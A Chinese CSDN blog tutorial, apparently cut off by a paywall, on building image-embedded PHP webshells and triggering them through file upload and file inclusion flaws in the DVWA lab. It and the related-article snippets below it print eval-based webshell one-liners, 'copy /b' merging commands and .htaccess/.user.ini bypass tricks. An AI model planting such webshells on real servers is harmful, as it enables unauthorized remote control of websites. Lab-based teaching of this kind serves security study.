【WEB攻防】图片木马的利用

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量1w 收藏 28
点赞数 5
分类专栏: web 渗透 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45983744/article/details/104325269
版权
本文详细介绍了图片木马的原理,利用文件上传漏洞和文件包含漏洞执行隐藏脚本,以获取服务器权限。通过DVWA靶场环境,展示了如何制作和上传图片木马,以及使用中国菜刀工具进行连接和控制。同时提出了防范措施,包括限制文件执行权限、检查文件类型和采用随机文件名。
摘要由CSDN通过智能技术生成

交流Q群:876554035

一,图片木马原理
图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。

二.工具及环境
DVWA靶场环境
010Editor
中国菜刀
三.具体步骤
1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。
在这里插入图片描述
图一 登陆界面
在这里插入图片描述
图二 选择安全级别,进入
2.利用010 Editor工具制作一句话图片木马,一句话木马为 <?php @eval($_POST[‘pass’]);?>
在这里插入图片描述
图三 制作图片木马
3.图片木马制作完成,跟正常图片看上去没什么两样,一句话木马写入图片中。
在这里插入图片描述
图四 图片马
4.在DVWA靶场中上传图片木马

最低0.47元/天 解锁文章
小小秋叶
关注
  • 5
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
图片利用的三种方式
weixin_48435065的博客
09-30 3129
user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。满足.user.ini、1.jpg和1.php(任意php文件)这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require('1.png'),进行了文件包含。首先上传图片利用文件包含上传的图片,使得php文件执行,然后使用菜刀连接。// 1.php(任意php文件)
一句话图片木马
热门推荐
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
做一个图片图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 965
图片:就是在图片中隐藏一句话木利用.htaccess等。
Atitit.图片木马的原理与防范 attilax 总结
weixin_33724046的博客
02-17 181
Atitit.图片木马的原理与防范 attilax 总结   1.1. 像图片的木桌面程序1 1.2. Web 服务端图片木马1 1.3. 利用了Windows的漏洞1 1.4. 这些漏洞不止Windows有,是很多软件都有,甚至sns wechat工具2 1.5. 利于图片meta数据区2 1.6. “会动的图片”—Flash动画,无需利用系统漏洞,而是利用动画本身的特性,直接对...
图片木马
阿刁〇的博客
05-21 3323
文章目录图片木马原理条件漏洞防范制作方法 图片木马 顾名思义,看上去很像图片的木。 木必然是个可执行的程序文件,其后缀名是“exe”。 原理 以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木,从而获取目标服务器的权限。 条件 图片能够正常显示 包含可执行的恶意代码 漏洞防范 尽量使用最新的web服务器版本 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限) 可以的话,对图片进行二次处理,把
简单图片木马的生成与利用
Deeeelete的博客
02-08 1万+
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
图片制作和利用
晚风不及你
09-03 1966
Web应用的安全攻防之网页木(SPY)
08-23
### Web应用的安全攻防之网页木(SPY) #### 知识点概览 1. **木的历史背景与概念** 2. **网页木(SPY)定义与工作原理** 3. **网页木的主要危害** 4. **网页木(SPY)的主要攻击方式** 5. **网页木(SPY)的...
web安全攻防实战
qq_44806973的博客
09-02 1594
WEB安全渗透工具docker容器安装三级目录 渗透工具 1.burpsuite 2.curl 3.postman 4.wappalyzer 5.hackbar docker容器安装 [docker下载地址(https://www.docker.com/products/docker-desktop) 三级目录
web安全攻防渗透测试实战指南
jhf223344的博客
04-05 8998
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3739
通常在木的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木隐藏到图片中,以此来绕过防御,进行上传。
利用cmd制作一句话图片
weixin_30408165的博客
06-05 563
先cd进在图片和一句话木里面的文件夹 假设选择我的图片是:1.jpg 一句话是:2.php 命令:copy 1.jpg/a+2.php/b 生成的图片 转载于:https://www.cnblogs.com/haq5201314/p/6943513.html...
制作简单图片木马
Ro_kin的博客
07-20 9643
下面来制作一个简单的图片木马 我就把电脑桌面的一个图片作为例子吧 下面是原始图片: test.png 接下来写一句话木 新建一个muma.php文件,写入一句话木<?php eval($_POST['hh']); ?>然后在win+R,cmd,cd到原始图片的目录路径下 我的就是桌面了,输入copy test.png/b+muma.php/a muma.png如图: 桌面
制作——图片木马制作
weixin_50339082的博客
06-09 1万+
制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木图片格式包括jpg,png等,原理是将木程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
图片木马的制作
qq_46277212的博客
06-27 728
1.一张图片,jpg格式 1.jpg 2.一句话木 2.asp <?php eval requset ("value");?> 3.cmd: copy 1.jpg/b+1.asp/a 2.jpg 使用Notepad++打开可发现,在jpg文件底部有着木代码
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值